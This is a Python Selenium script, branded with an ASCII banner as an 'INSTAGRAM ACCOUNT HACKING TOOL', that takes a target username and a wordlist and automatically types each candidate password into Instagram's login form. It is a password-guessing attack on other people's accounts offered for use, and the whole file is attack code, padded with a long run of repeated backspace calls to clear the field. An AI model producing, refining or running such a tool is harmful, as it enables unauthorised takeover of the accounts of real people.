
from os import read
from urllib.parse import urldefrag
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from time import sleep
val=True
if val==True:     
    print('''██╗███╗   ██╗███████╗     ██╗████████╗██╗  ██╗
██║████╗  ██║██╔════╝     ██║╚══██╔══╝██║ ██╔╝
██║██╔██╗ ██║███████╗     ██║   ██║   █████╔╝ 
██║██║╚██╗██║╚════██║██   ██║   ██║   ██╔═██╗ 
██║██║ ╚████║███████║╚█████╔╝   ██║   ██║  ██╗
╚═╝╚═╝  ╚═══╝╚══════╝ ╚════╝    ╚═╝   ╚═╝  ╚═╝
  INSTAGRAM ACCOUNT HACKING TOOL.
        Made by --> Mr.JTK
        Code by --> Mr.JTK
        Made in --> Python
  This Tool is made for Hacking ''')
name=input("Enter name to Hack --: ")
wordlist=input("Enter path to wordlist: ")
browser=webdriver.Firefox(executable_path="./geckodriver")
browser.set_window_size(900,900)
browser.set_window_position(0,0)
browser.get("https://instagram.com/")
sleep(0.4)
browser.find_element_by_name("username").send_keys(name)
f=open(wordlist)
a=f.read().splitlines()
for i in a:
         print("Password if next is error then it is right ==> ",i)
         browser.find_element_by_name("password").send_keys(i)
         sleep(0.12)
         browser.find_element_by_name("password").send_keys(Keys.ENTER)
         sleep(2)         
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)              
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE)
         browser.find_element_by_name("password").send_keys(Keys.BACKSPACE) 
         
